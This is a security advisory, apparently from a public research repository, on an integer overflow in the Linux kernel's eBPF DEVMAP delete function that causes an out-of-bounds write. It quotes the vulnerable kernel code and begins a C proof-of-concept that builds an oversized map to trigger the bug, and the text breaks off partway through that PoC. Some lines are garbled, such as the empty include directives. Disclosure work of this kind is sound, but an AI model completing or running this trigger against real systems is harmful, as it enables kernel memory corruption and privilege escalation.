**security-research** Public
# Integer Overflow in eBPF DEVMAP map_delete_elem Leads to Out-of-Bounds
## Package
## Affected versions
## Patched versions
## Description
### Summary
AF_XDP sockets provide a high-performance mechanism for packet processing within the kernel. This bug report describes an integer overflow vulnerability in the `devmap_map_delete_elem` (function) when handling eBPF (DEVMAP) maps, potentially leading to an out-of-bounds write and subsequent security risks.
### Severity
Moderate – This vulnerability can allow an attacker to This could allow them to hijack the control flow of the kernel and execute arbitrary code with kernel privilege and or a denial of serivce.
### Proof of Concept
In the `dev_map_delete_elem` function an unsigned integer ( `map->max_entries`) is compared with a user-controlled signed integer (k). Due to implicit type conversion, a large unsigned value for `map->max_entries` can bypass the intended bounds check:
“`
if (k >= map->max_entries) return -EINVAL;
“`
This allows k to hold a negative value (between -2147483648 and -2), which is then used as an array index in `dtab->netdev_map[k]`, which results in an out-of-bounds access.
“`
old_dev = unrcu_pointer(xchg(&dtab->netdev_map[k], NULL)); if (old_dev) { call_rcu(&old_dev->rcu, __dev_map_entry_free); atomic_dec((atomic_t *)&dtab->items); }
“`
The `xchg` operation can then be used to cause an out-of-bounds write. Moreover, the invalid `old_dev` passed to `__dev_map_entry_free` can lead to further memory corruption.
“`
// compile with gcc -o map_poc map_poc.c -lbpf #include #include #include #include #include #include #include int main() { // Create a large enough BPF DEVMAP map int map_fd; union bpf_attr create_attr = { .map_type = BPF_MAP_TYPE_DEVMAP, .key_size = sizeof(int), .value_size = sizeof(int), .max_entries = 0x80000000 + 2, }; map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &create_attr, sizeof(create_attr)); if (map_fd